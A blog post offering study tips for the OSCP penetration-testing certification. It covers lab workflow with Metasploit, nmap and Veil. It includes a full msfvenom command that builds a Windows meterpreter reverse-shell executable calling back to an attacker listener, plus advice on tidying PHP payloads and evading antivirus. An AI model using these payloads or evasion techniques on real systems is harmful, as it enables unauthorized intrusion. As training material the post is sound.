This is the third in a series of posts about the OSCP certification and my journey to acquire it. This post is focused primarily on things I did that helped me to succeed.
Something to get out of the way right off:
I can't talk solutions to lab machines or exam targets! I will not give them to you, so don't ask!
Still, here is what I found most useful in passing PWK. These entries are in no way comprehensive; they're simply what stands out to me the most when I think back and review my notes.
VMs for compiling exploit code
A common issue on the forums is trouble compiling Linux (and, to a lesser extent, Windows) privilege escalation binaries. This is especially true now that OffSec is using a Kali 2-based VM for students, which has a much newer kernel and associated glibc than the previous 1.x release, which itself is much newer than the lab targets I ran into.
You can generally mitigate compilation issues (such as segfaults on the target) by being familiar with gcc flags. However, I preferred to simply route around the problem by compiling exploit code on older Linux versions.
I set up a CentOS 5 VM (actually two, one 32-bit and one 64-bit) in Xenserver and did all of my compile work there. I never had to fuss with special flags or anything like that; all the code just compiled and ran.
If you're already knowledgeable about gcc flags and settings you're probably laughing at me, but hey, I took the path of least resistance!
Being proficient at working with VMs is a good thing in general, simply for being able to stand up new instances to play with interesting new software or use as test targets. Don't forget about Vulnhub either; while they usually recommend VirtualBox to host a VM, most of them work fine in Xenserver or VMware if you know how to import the files.
Gitlab for engagement organization
I'm a big fan of Gitlab, an open source clone of GitHub. With a code and file repository, wiki module, issue tracker, and numerous other features, it's what 0meta uses to track information during an engagement. There are other bespoke tools for this exact purpose out there, such as Faraday and Dradis. However, they both suffer a fair bit from the "open core" model, where some decent functionality is free software...and the rest is not. I'm very picky about this sort of thing personally, and tend to dislike it unless the proprietary bits truly are enterprise oriented.
Gitlab does have an enterprise version, but the vast majority of features are freely available in the community edition. I've been using it for years, it's rapidly updated, responsive to security CVEs, and pretty easy to set up at this point.
Fitting git into a penetration tester's workflow is something I might talk about at a later time, but I use it to set up the 'skeleton' of the engagement as well as to keep all the files synchronized. I use the issue tracker for tracking the different phases of the engagement, the wiki for holding bulk notes, and the repo itself for the artifacts and loot.
The Metasploit Framework
The PWK course does a decent job of introducing the Metasploit Framework and the msfvenom tool. I mentioned it elsewhere, but I would strongly recommend becoming adept at using all of the tools and modules the MSF provides you. The post modules in particular are great once you have a session up and running. I replaced nearly all of my exploit-db exploit payloads with a meterpreter binary, and did 80%+ of my work with it.
The transition from using coursework tools like ncat early on in the lab to using mimikatz (through the post/windows/gather/credentials/sso module) and meterpreter sessions correlated directly with my rapid increase in exploit 'rate.' This reflected the refinement of my process as I moved forward.
I still understood non-MSF exploit code, and I didn't neglect changing exploit code when it suited my purposes. But if there was an exploit module for my lab target, I took it.
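For the record, generating that standalone meterpreter binary is a one-liner. A sketch, with placeholder LHOST/LPORT/filename that you would adjust to your Kali IP and listener:

```shell
# windows/meterpreter/reverse_tcp packaged as a Windows executable;
# pair it with a matching exploit/multi/handler listener in msfconsole.
msfvenom -p windows/meterpreter/reverse_tcp \
         LHOST=10.11.0.5 LPORT=443 -f exe -o met.exe
```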
As for msfvenom, just remember that it outputs more than just C/Python shellcode. WAR files, PHP, and Perl were all modes of output that I used. With PHP in particular, I found it most useful to remove extraneous line breaks and such with sed, as some web applications seemed to execute scripts more reliably that way. Don't forget that the PHP output lacks the actual PHP tags at the beginning and end! Also pay attention to the use of single and double quotes inside the payload, because they can be canceled or messed up by quotes that appear outside of the shellcode snippet.
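As a sketch of that cleanup step (the payload file here is a fabricated stand-in for real msfvenom PHP output, and I use tr rather than sed for the newline stripping):

```shell
# Stand-in for 'msfvenom -p php/... -f raw' output: multi-line
# PHP with no opening <?php tag.
printf 'eval(\n"payload"\n);\n' > shell.php

# Prepend the tag and strip the newlines in one pass.
{ printf '<?php '; tr -d '\n' < shell.php; } > shell_oneline.php
cat shell_oneline.php    # -> <?php eval("payload");
```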
Veil
I found Veil because one lab host had some files on a webserver suggesting that anti-virus might be a concern when contemplating payload selection.
The labs don't have much AV presence overall, but I think that is an emphasis in the Cracking the Perimeter course, and thus is more or less intentional. It turns out that the AV on this host, from a prominent software vendor, didn't seem to care about even a naked meterpreter binary, much less the Veil file that I used at first.
Using Veil was a bit different than what I was expecting. Veil is both a tool for creating payloads to evade signature-based AV, and a tool to deliver said payloads if you happen to have remote execution on the host already through pass-the-hash.
More than once I ran into text that had been obfuscated by base64 encoding it. There is a base64 binary available in the terminal, and also websites that handle conversions. Look for telltale signs like the '=' padding characters.
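A quick round-trip with the base64 binary; note the trailing '=' padding that gives encoded text away:

```shell
# Encode: the '=' at the end is the telltale padding.
printf 'admin' | base64          # -> YWRtaW4=

# Decode what you found on the target.
printf 'YWRtaW4=' | base64 -d    # -> admin
```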
Kali's useful directories
There are all sorts of little directories in Kali with interesting things in them. I remember stumbling on a cache of webshells in one location after several weeks in the lab; it would have saved me a fair bit of time looking for good ones online, had I known. I don't have a Kali instance in front of me, but I think it was /usr/share/webshells. Have a look around and see if there's anything else!
Turn PHP off
In Kali, the Apache web server is configured with PHP, and server-side scripting is enabled. This can cause confusion when trying to run RFI against a lab target: your script actually executes on your own server instead of being served to the target.
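Disabling it is quick. A sketch, noting that the Apache PHP module name varies by Kali release (check /etc/apache2/mods-enabled/ for the exact one on your instance):

```shell
# The module may be php5, php7.0, php7.4, etc. depending on release.
sudo a2dismod php7.4
sudo systemctl restart apache2
```

With the module disabled, Apache serves .php files as plain text, which is exactly what you want for RFI.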
nmap and you
Everybody uses nmap, and so should you, but please don't nuke a target host or network with every scan parameter and script under the sun.
Your scans should start off narrow and light. Use the --top-ports option with a relatively small number, like 100. Do the same with UDP. You don't even need to start off with -sV, since knowing every single thing about the host isn't what you're going for early on.
Based on those results, expand your scans. Keep version and banner grabbing to services you've discovered are open. Everything filtered or closed? If you're already suspicious of the host and other recon suggests it, you can even scan for some of the more exotic protocols nmap allows for.
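Put together, a staged workflow might look like this. The target address is a placeholder, and the exact staging is my habit, not gospel:

```shell
# Stage 1: quick look at the most common ports, TCP then UDP.
nmap --top-ports 100 10.11.1.5
nmap -sU --top-ports 100 10.11.1.5   # UDP scans need root

# Stage 2: version/banner grabbing, but only on what stage 1 found open.
nmap -sV -p 22,80,139,445 10.11.1.5

# Stage 3 (only if other recon suggests it): full TCP sweep.
nmap -p- 10.11.1.5
```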
If a service won't reveal anything about itself, or nmap is confused about the "fingerprint," you can often learn something by attaching with telnet or ncat/socat, visiting with a web browser, or just using curl if you like.
There is one host in the labs that does react to being aggressively scanned with nmap. Using the -T switch with a 1 or 2, and keeping the ports narrowly defined, helps a great deal. Practice and see how aggressive you can be before the host reacts!
Finally, be careful with scripts. There are a ton of them, and you should choose what you're using explicitly. I kept a terminal window open in /usr/share/nmap/scripts/ and would grep for scripts that might be relevant based on the services I discovered with primary scans. Running scripts willy-nilly wastes time and makes you noisy. At worst, you can run something unsafe that crashes a service!
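The grep habit looks like this. I simulate the script directory here so the example is self-contained; on Kali the real path is /usr/share/nmap/scripts/:

```shell
# Fake script directory standing in for /usr/share/nmap/scripts/.
mkdir -p /tmp/nmap-scripts
touch /tmp/nmap-scripts/smb-vuln-ms08-067.nse \
      /tmp/nmap-scripts/http-title.nse \
      /tmp/nmap-scripts/ftp-anon.nse

# Found SMB open? See which scripts might apply before running anything.
ls /tmp/nmap-scripts | grep -i smb
```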
The two hands, upload and execution
If you've ever seen one of those enclosed vacuum workspaces where a human operator puts their hands inside two "gloves" built into the side of the container and manipulates things with them, you have a bit of an idea what it's like popping a host.
What you're aiming to accomplish is getting code you control onto the host, and then executing that code. Sometimes this is one and the same action, as with remote buffer overflows or RFI, but often these are two discrete sequences.
For example, there were multiple lab hosts where I had to upload malicious code through one vector, like a database, but execute that code with a completely different web application. Sometimes upload is through weak SSH credentials or upload facilities built into an application. Execution often involved scripting, tricking an application into executing something it shouldn't, or normal execution from a location I controlled instead of where the application expected.
Breaching lab hosts is often figuring out the answers to two questions:
"Where do I get code onto the box?"
"How do I get that code executed?"
That's a different question than the one students seem to jump to, which is "what exploit do I run against this host?"
Obviously, there are hosts with no vulnerable services. These often involve client attacks through a browser, or simply finding remote access credentials elsewhere.
Enumeration is usually about what's running, where, with what access controls. (Client-side is more who's visiting, with what, from where...)
To that end, onesixtyone and other scanning tools are only part of the process.
Don't overlook various places where really important indicators like version strings can hide. They may require you to poke around manually.
- viewing source HTML, looking for interesting things like version strings or paths to other resources
- purposefully going to a bad URL
- visiting an 'about' page
- using FTP read access to a huge swath of the filesystem to visit program directories and see what's installed
- connecting with ncat, telnet, etc., getting error codes or interesting responses, and Googling the strings
And so forth.
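For the HTML-source case, a sketch of the kind of thing to look for. The page here is fabricated (including the "ExampleApp" name) so the example is self-contained; in the lab you'd fetch the real thing with curl -s http://<target>/:

```shell
# Fabricated page standing in for a target's index.html.
cat > /tmp/index.html <<'EOF'
<html><head><meta name="generator" content="WordPress 2.8.1"></head>
<!-- served by ExampleApp 1.3.2 -->
<body>hello</body></html>
EOF

# Crude but effective: name-plus-version patterns hide in generator
# meta tags and HTML comments.
grep -oE '[A-Za-z]+ [0-9]+\.[0-9.]+' /tmp/index.html
```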
Exploit-db & Google
When I was enrolled, exploit-db wasn't using a captcha at all. OffSec has switched to a Google-based one that has you identify various things in images, which I'm pretty good at and almost never fail.
However, if those things drive you crazy, there's always Google. Just use a
site:exploit-db.com <search term>
query and you can bypass having to deal with it. It's not flawless, but it's usually faster if you have a decent idea what you're looking for.
I know about searchsploit, but I find its...search to be pretty poor. I usually had to engage in a lot of grepping and such to effectively narrow down results.
As an aside, MSF's search in the console is also pretty terrible. Maybe I should investigate using an ELK deployment with indices of MSF modules, hmm....
Test your exploits
Testing your exploit code, especially code you've had to modify for a new target, can be pretty tedious. But you absolutely cannot skip this step. Not if you want to be the best penetration tester you can be.
VMs, again, are very useful for quickly standing up an environment for doing this sort of work, be it in Windows or Linux. Trying out an exploit, especially one where you had to fiddle with it a little bit, gives you the chance to prevent dumb mistakes that in the real world could cost you an ingress point.
It's even worth mentioning that the same exploit, implemented a different way, can work more or less effectively. As an example, in the lab there are quite a few machines vulnerable to the iconic MS08-067 SMB RPC vulnerability. However, the MSF module for this exploit honestly wasn't very reliable against lab hosts, in my experience. Even after a revert, some of them were well under 50% effective, and whether they worked or failed, they generally wrecked the SMB server and caused it to crash, meaning another revert. In the real world, this would be noisy and suspicious to any administrators paying attention.
This was annoying, so I looked around, and there is a Python version of the exploit that works in a very stable and repeatable way. Even if it failed, the SMB server service generally didn't completely crash. The script doesn't have the same target list, mind (and I was too lazy to port the RETN addresses and such from the MSF module). I swapped the payload with a meterpreter binary and never used the exploit module again.
As a final note, exploit-db will often have a download of the vulnerable application as a part of the exploit page. Take advantage of this when doing research and testing for your target!
As an aside, you should definitely read this write-up from a Microsoft engineer of how the MS08-067 exploit was detected and patched. If you want to help out in defense/blueteam ops like I do, it's fascinating.
Look around once you're in
Students sometimes get so focused on popping boxes that they forget to have a look around once they have full access. OffSec leaves clues and critical information for exploiting certain hosts on other machines; without this information, you cannot breach some hosts. Look in user directories, not just those of the administrator or root user. Look in bash_history files. Look at the versions of installed applications like Adobe Reader or Internet Explorer. You don't have to use the data immediately; just store it away so that if you need a baseline version to aim an exploit at, you have it ready. Getting access to the domain controllers on the network starts with simple observation of little things like these.
That about wraps up this series. The OSCP is one of the most demanding and brutal intellectual exercises I have ever engaged in. I'm glad I was able to make it through to the end and Try Harder. It's not a perfect course, but I believe it to be one of a kind, and it lays the foundation for a career that can take its holder in any number of different directions. If you read all of this and haven't been convinced of its merit, then place the blame on me and look closer for yourself. You won't regret it.